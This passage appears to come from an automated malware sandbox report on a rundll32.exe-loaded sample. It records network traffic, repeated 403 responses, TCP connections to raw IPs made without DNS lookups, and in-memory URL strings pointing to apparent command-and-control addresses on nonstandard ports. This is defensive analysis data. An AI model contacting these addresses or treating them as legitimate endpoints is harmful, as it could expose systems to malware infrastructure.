                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50172
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:43 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:56 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:59 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:03 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:07 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:11 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:15 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:23 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:27 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:33 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:41 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:47 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:49 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:56 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:02 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:06 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:15 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:19 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:19 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:23 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:23 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:27 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:38 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:42 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:43 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:46 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:47 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:50 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:54 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:02 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:02 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:06 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:06 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:14 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: rundll32.exe, 00000003.00000003.522212080.0000000003004000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: rundll32.exe, 00000003.00000003.489992121.0000000003004000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                      Source: rundll32.exe, 00000003.00000002.870011136.0000000002F9A000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: rundll32.exe, 00000003.00000002.870011136.0000000002F9A000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.3.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: rundll32.exe, 00000003.00000003.487626211.000000000508E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.870011136.0000000002F9A000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?2e85d5c03e218
                      Source: rundll32.exe, 00000003.00000003.522212080.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/
                      Source: rundll32.exe, 00000003.00000003.522212080.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/
                      Source: rundll32.exe, 00000003.00000003.542599295.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/My
                      Source: rundll32.exe, 00000003.00000003.834897393.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/h
                      Source: rundll32.exe, 00000003.00000002.870083390.0000000003004000.00000004.00000020.sdmpString found in binary or memory: https://143.244.140.214:808/hy
                      Source: rundll32.exe, 00000003.00000003.818278271.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/j
                      Source: rundll32.exe, 00000003.00000003.818278271.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l
                      Source: rundll32.exe, 00000003.00000003.522212080.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l1
                      Source: rundll32.exe, 00000003.00000003.690035042.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/ll
                      Source: rundll32.exe, 00000003.00000003.619902609.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/ll1
                      Source: rundll32.exe, 00000003.00000003.522212080.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/lm
                      Source: rundll32.exe, 00000003.00000003.717236230.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/oft
                      Source: rundll32.exe, 00000003.00000003.556993945.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://182.46.210.220/
                      Source: rundll32.exe, 00000003.00000003.522212080.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/
                      Source: rundll32.exe, 00000003.00000003.542599295.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/
                      Source: rundll32.exe, 00000003.00000002.870135617.0000000003071000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/b
                      Source: rundll32.exe, 00000003.00000003.628258081.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/soft
                      Source: rundll32.exe, 00000003.00000003.522212080.0000000003004000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.681709088.0000000003004000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.505214058.0000000005090000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/
                      Source: rundll32.exe, 00000003.00000003.681709088.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/(
                      Source: rundll32.exe, 00000003.00000003.522212080.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/1-
                      Source: rundll32.exe, 00000003.00000002.870117440.0000000003068000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/563209-4053062332-1002?
                      Source: rundll32.exe, 00000003.00000003.582189208.000000000508F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/7.0.96:6891/Microsoft
                      Source: rundll32.exe, 00000003.00000003.784548798.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/9-
                      Source: rundll32.exe, 00000003.00000003.522212080.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/:
                      Source: rundll32.exe, 00000003.00000003.603018518.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/=-
                      Source: rundll32.exe, 00000003.00000002.870117440.0000000003068000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Certification
                      Source: rundll32.exe, 00000003.00000002.870117440.0000000003068000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/GlobalSign
                      Source: rundll32.exe, 00000003.00000003.681709088.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/I
                      Source: rundll32.exe, 00000003.00000003.818278271.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/gz
